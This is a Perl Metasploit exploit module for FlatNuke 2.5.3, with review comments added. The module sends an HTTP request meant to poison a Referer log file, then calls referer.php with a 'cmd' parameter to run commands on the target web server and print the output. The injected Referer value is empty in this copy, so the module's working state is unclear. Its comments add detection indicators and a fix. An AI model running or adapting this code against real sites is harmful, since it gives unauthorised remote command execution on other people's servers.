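##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::flatnuke_253_referer;

use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;

# No advanced options are defined for this module.
my $advanced = { };

# Module metadata passed to the Msf::Exploit constructor by new().
# UserOpts entries are [required, type, description, default].
# 'Refs' is empty: the file carries no advisory or vendor reference, so the
# affected-version claim rests on the module name alone.
my $info = {
    'Name'     => 'FlatNuke 2.5.3 Referer Poisoning',
    'Version'  => '$Revision: 1.1 $',
    'Authors'  => [
        'http://arkanoid.altervista.org - arkanoid@altervista.org',
    ],
    'Arch'     => [ ],
    'OS'       => [ ],
    'Priv'     => 0,
    'UserOpts' => {
        'RHOST'    => [1, 'ADDR', 'The target address'],
        'RPORT'    => [1, 'PORT', 'The target port', 80],
        'HOSTNAME' => [1, '', 'Hostname', 'localhost'],
        'DIR'      => [1, '', 'Flatnuke\'s directory', '/flatnuke/'],
        'CMD'      => [1, '', 'Default command', 'dir'],
    },
    'Description' => Pex::Text::Freeform(qq{
        FlatNuke 2.5.3 HTTP Referer Poisoning
    }),
    'Refs'     => [ ],
};

# Constructor: hands the module metadata and any caller arguments to the
# Msf::Exploit base class and returns the resulting object.
sub new {
    my $class = shift;
    my $self  = $class->SUPER::new(
        { 'Info' => $info, 'Advanced' => $advanced },
        @_,
    );
    return $self;
}

# Sends two HTTP requests over one TCP connection: a GET for DIR carrying a
# Referer header, and, if the reply contains "200 OK", a GET for
# DIR/misc/flatstat/referer.php with the CMD option as the "cmd" query
# parameter. The second reply is printed to the user.
#
# Presumably the flatstat component stores the Referer header in that .php
# file, which the server later executes; this file does not show that side,
# so confirm against the FlatNuke source. For defenders, the visible
# indicators are requests to misc/flatstat/referer.php with a "cmd"
# parameter; the durable fix is to keep logged request headers out of files
# the web server treats as executable.
#
# Returns nothing; failures are reported through PrintLine.
sub Exploit {
    my $self = shift;

    # RHOST is the address to connect to; HOSTNAME only fills the Host
    # header. The original declared $targetHost twice, so HOSTNAME silently
    # replaced RHOST and the socket connected to the wrong value.
    my $targetHost = $self->GetVar('RHOST');
    my $targetPort = $self->GetVar('RPORT');
    my $vhost      = $self->GetVar('HOSTNAME');
    my $targetDir  = $self->GetVar('DIR');

    # NOTE(review): CMD is placed in the request line unencoded; the
    # original had a uri_escape() call here but left it commented out.
    my $targetCmd  = $self->GetVar('CMD');

    my $sock = Msf::Socket::Tcp->new(
        'PeerAddr' => $targetHost,
        'PeerPort' => $targetPort,
    );
    if ($sock->IsError) {
        $self->PrintLine('Error creating socket: ' . $sock->GetError);
        return;
    }

    # NOTE(review): the Referer value is empty in this copy of the file
    # (possibly lost when the page was extracted); it is left as found.
    my $buf = "GET $targetDir HTTP/1.1\n";
    $buf .= "Host: $vhost\n";
    $buf .= "Referer: \n\n";
    $sock->Send($buf);
    my $r = $sock->Recv(-1);

    # Recv may yield nothing; treat that as a failed first request.
    if (defined $r && $r =~ /200 OK/) {
        $self->Print("[+] Poisoned!\n");
        $self->Print("[*] Try to exec command...!\n");

        $buf  = "GET $targetDir";
        $buf .= "misc/flatstat/referer.php?cmd=$targetCmd\n";
        $buf .= "Host: $vhost\n\n";
        $sock->Send($buf);
        $r = $sock->Recv(-1);

        # Route the reply through the framework's output, like every other
        # message here, instead of printing straight to STDOUT.
        $self->Print($r) if defined $r;
    }
    else {
        $self->PrintLine("[+] Failed!\n");
    }

    # The original never released the connection.
    $sock->Close;
    return;
}

1;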